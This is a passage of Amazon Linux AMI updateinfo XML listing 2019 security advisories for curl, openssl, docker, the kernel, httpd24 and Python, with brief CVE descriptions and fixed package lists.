arch="i686"><filename>Packages/libXcursor-1.1.14-2.1.10.amzn1.i686.rpm</filename></package><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1151</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1151: medium priority package update for curl</title><issued date="2019-02-07 04:24:00" /><updated date="2019-02-08 06:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20483:
set_file_metadata in xattr.c in GNU Wget before 1.20.1 stores a file&#039;s origin URL in the user.xdg.origin.url metadata attribute of the extended attributes of the downloaded file, which allows local users to obtain sensitive information (e.g., credentials contained in the URL) by reading this attribute, as demonstrated by getfattr. This also applies to Referer information in the user.xdg.referrer.url metadata attribute. According to 2016-07-22 in the Wget ChangeLog, user.xdg.origin.url was partially based on the behavior of fwrite_xattr in tool_xattr.c in curl.
1662705:
CVE-2018-20483 wget: Information exposure in set_file_metadata function in xattr.c
CVE-2018-0500:
A heap-based buffer overflow has been found in the Curl_smtp_escape_eob() function of curl. An attacker could exploit this by convincing a user to use curl to upload data over SMTP with a reduced buffer to cause a crash or corrupt memory.
1597101:
CVE-2018-0500 curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0500" title="" id="CVE-2018-0500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20483" title="" id="CVE-2018-20483" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-7.91.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-7.91.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-7.91.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-7.91.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="7.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-7.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1153</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1153: low priority package update for openssl</title><issued date="2019-03-21 18:40:00" /><updated date="2019-03-25 23:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0734:
The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a (Affected 1.1.1). Fixed in OpenSSL 1.1.0j (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q (Affected 1.0.2-1.0.2p).
1644364:
CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0734" title="" id="CVE-2018-0734" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.148.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.148.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.148.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.148.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1156</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1156: important priority package update for docker</title><issued date="2019-02-08 22:28:00" /><updated date="2019-02-11 16:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5736:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5736" title="" id="CVE-2019-5736" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-debuginfo" version="18.06.1ce" release="7.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.06.1ce-7.25.amzn1.x86_64.rpm</filename></package><package name="docker" version="18.06.1ce" release="7.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.06.1ce-7.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1165</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1165: important priority package update for kernel</title><issued date="2019-02-26 18:55:00" /><updated date="2019-03-04 23:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-7222:
An information leakage issue was found in the way Linux kernel&#039;s KVM hypervisor handled page fault exceptions while emulating instructions like VMXON, VMCLEAR, VMPTRLD, and VMWRITE with memory address as an operand. It occurs if the operand is a mmio address, as the returned exception object holds uninitialized stack memory contents. A guest user/process could use this flaw to leak host&#039;s stack memory contents to a guest.
1671930:
CVE-2019-7222 Kernel: KVM: leak of uninitialized stack contents to guest
CVE-2019-7221:
A use-after-free vulnerability was found in the way the Linux kernel&#039;s KVM hypervisor emulates a preemption timer for L2 guests when nested (=1) virtualization is enabled. This high resolution timer(hrtimer) runs when a L2 guest is active. After VM exit, the sync_vmcs12() timer object is stopped. The use-after-free occurs if the timer object is freed before calling sync_vmcs12() routine. A guest user/process could use this flaw to crash the host kernel resulting in a denial of service or, potentially, gain privileged access to a system.
1671904:
CVE-2019-7221 Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer
CVE-2019-6974:
A use-after-free vulnerability was found in the way the Linux kernel&#039;s KVM hypervisor implements its device control API. While creating a device via kvm_ioctl_create_device(), the device holds a reference to a VM object, later this reference is transferred to the caller&#039;s file descriptor table. If such file descriptor was to be closed, reference count to the VM object could become zero, potentially leading to a use-after-free issue. A user/process could use this flaw to crash the guest VM resulting in a denial of service issue or, potentially, gain privileged access to a system.
1671913:
CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6974" title="" id="CVE-2019-6974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7221" title="" id="CVE-2019-7221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7222" title="" id="CVE-2019-7222" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.101" release="75.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.101-75.76.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.101-75.76.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.101" release="75.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.101-75.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1166</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1166: important priority package update for httpd24</title><issued date="2019-03-06 22:21:00" /><updated date="2019-03-25 23:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0190:
A bug exists in the way mod_ssl handled client renegotiations. A remote attacker could send a carefully crafted request that would cause mod_ssl to enter a loop leading to a denial of service. This bug can be only triggered with Apache HTTP Server version 2.4.37 when using OpenSSL version 1.1.1 or later, due to an interaction in changes to handling of renegotiation attempts.
1668488:
CVE-2019-0190 httpd: mod_ssl: infinite loop triggered by client-initiated renegotiation when using OpenSSL 1.1.1
CVE-2018-17199:
In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the expiry time is loaded when the session is decoded.
1668493:
CVE-2018-17199 httpd: mod_session_cookie does not respect expiry time
CVE-2018-17189:
In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 (mod_http2) connections.
1668497:
CVE-2018-17189 httpd: mod_http2: DoS via slow, unneeded request bodies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17189" title="" id="CVE-2018-17189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17199" title="" id="CVE-2018-17199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0190" title="" id="CVE-2019-0190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.38" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.38-1.86.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.38" release="1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.38" release="1.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.38" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.38-1.86.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.38" release="1.86.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.38" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.38-1.86.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.38" release="1.86.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.38-1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1167</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1167: important priority package update for kernel</title><issued date="2019-03-07 18:18:00" /><updated date="2019-03-25 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8912:
In the Linux kernel af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free (UAF) in sockfs_setattr. A local attacker can use this flaw to escalate privileges and take control of the system.
1678685:
CVE-2019-8912 kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8912" title="" id="CVE-2019-8912" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.104-78.84.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.104-78.84.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.104" release="78.84.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.104-78.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1169</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1169: medium priority package update for python27 python34 python35 python36</title><issued date="2019-03-21 19:25:00" /><updated date="2019-03-25 23:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5010:
A null pointer dereference vulnerability was found in the certificate parsing code in Python. This causes a denial of service to applications when parsing specially crafted certificates. This vulnerability is unlikely to be triggered if application enables SSL/TLS certificate validation and accepts certificates only from trusted root certificate authorities.
1666519:
CVE-2019-5010 python: NULL pointer dereference using a specially crafted X509 certificate
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5010" title="" id="CVE-2019-5010" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.125.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.125.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.9-1.41.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.9-1.41.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.6" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.6-1.14.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.6-1.14.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-libs" 